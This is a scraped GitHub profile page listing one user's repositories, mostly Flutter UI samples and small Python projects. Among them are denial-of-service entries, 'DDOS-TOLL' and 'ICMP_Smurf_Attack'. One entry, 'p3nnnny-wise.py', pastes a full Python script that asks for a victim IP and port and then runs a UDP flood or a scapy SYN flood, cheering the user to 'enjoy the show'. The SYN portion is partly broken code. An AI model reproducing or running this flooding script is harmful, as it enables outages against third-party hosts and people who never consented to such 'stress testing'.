Gerardo Brallan Zenteno Molina's repositories

Language:CSSStargazers:1Issues:0Issues:0
Language:DartStargazers:1Issues:0Issues:0

Awesome-Python-Scripts

A Curated list of Awesome Python Scripts that Automate Stuffs.

Language:PythonLicense:MITStargazers:0Issues:0Issues:0

calculator-tkinter

A simple calculator with python3 and tkinter

Language:PythonLicense:BSD-2-ClauseStargazers:0Issues:1Issues:0

card_ui_kit

A collection of cards that you can use easily and ready to be used in your Flutter applications.

Language:DartStargazers:0Issues:0Issues:0

CarouselOverlappingCards-Flutter

Overlapping cards vertical scrolling with carousel effect

Language:DartStargazers:0Issues:0Issues:0

Snake-Game-in-Python

Classic snake game in python3 🐍

Language:PythonLicense:BSD-2-ClauseStargazers:0Issues:1Issues:0
Language:MakefileStargazers:0Issues:0Issues:0

DDOS-TOLL

A tool that performs HULK HTTP flood, Ping of Death, UDP flood, SNMP, Smurf ICMP, and Slowloris attacs

Stargazers:0Issues:0Issues:0

flutter-day-1

Flutter challenges - Day 1 - UI for a Wallets

Language:DartLicense:BSD-2-ClauseStargazers:0Issues:1Issues:0

Flutter-InfiniteCards

An infinite card switching UI for Flutter, support custom animation 自定义实现神奇动效的卡片切换视图

License:Apache-2.0Stargazers:0Issues:0Issues:0

ICMP_Smurf_Attack

ICMP Smurf Attack in python

Stargazers:0Issues:0Issues:0

lenguajesdeinternet

hello_world_in_Flutter

Language:JavaScriptStargazers:0Issues:0Issues:0

MeshCommander

MeshCommander is a Intel(R) Active Management Technology (Intel(R) AMT) remote management tool. It's feature rich and includes a built-in remote desktop viewer for Hardware-KVM, a Serial-over-LAN terminal, IDER-Redirection support and much more. MeshCommander is built on web technologies and runs on many plaforms. In addition to being available as a stand-alone tool, MeshCommander was built to be very space efficient to that it can be uploaded into Intel AMT flash space to have it served diretly from the Intel AMT web serve.

Language:JavaScriptLicense:Apache-2.0Stargazers:0Issues:0Issues:0

mr_tabs

Flutter Android Swipe Tabs with Cards example tutorial. Find complete tutorial here http://camposha.info/flutter/swipe-tabs-cards

Stargazers:0Issues:0Issues:0

p3nnnny-wise.py

Penny-Wise is a stress testinh hard hiting Denial Of service Script Made in Python here is the script ___ ___ ___ ___ ___ ___ | )|___)| )| )\ ) | )| |___ |___) |__/ |__ | / | / \_/ |/\/ | __/ |__ | / """ ) print ("*" * 60) print (" ̫̣̘̲͓" ) print ("*" * 60, "red") print (""" choose request 1. udp flood (for ppl) 2. synflood (for web sites **2 ONLY WORKS ON KALI LINUX**)""") type = raw_input("penny Wise> ") if type == "1": import socket import os import time import random import sys client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(1024) victim = raw_input("enter ip or website: ") vport = input(" port: ") duration = input("time(in secs): ") timeout = time.time() + duration sent = 0 print (""" **************************************************** Dos attack starting. Sit back and ejoy the show ****************************************************""") while 1: if time.time() > timeout: break else: pass client.sendto(bytes, (victim, vport)) sent = sent + 1 sys.stdout.write("\r% d packets sent " % sent) sys.stdout.flush() if type == "2": import socket, random, sys, threading from scapy.all import * total = 0 target1 = raw_input("targets site: ") port = input("port: ") class SendHTTP(threading.Thread): global target, port def __init__(self): threading.Thread.__init__(self) def run(self): i = IP() i.dst = target1 t = TCP() t.sport = random.randint(1,65535) t.dport = port f.flags = 's' send(i/t, verbose=0) print (""" ******************************************************** Dos attack starting. Sit back and ejoy the show ******************************************************""") while 1: SendHTTP(POST).start() total = total + 1 sys.stdout.write("\r packets sent %i" % total)

Stargazers:0Issues:0Issues:0
Language:CStargazers:0Issues:0Issues:0

scammingthescammers

short script for scamming the scammers with phishing links, by brute forcing random data that makes sense

Language:PythonLicense:MITStargazers:0Issues:0Issues:0

SecLists

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

License:MITStargazers:0Issues:0Issues:0

Taskist

Flutter ToDo App with Firebase

License:MITStargazers:0Issues:0Issues:0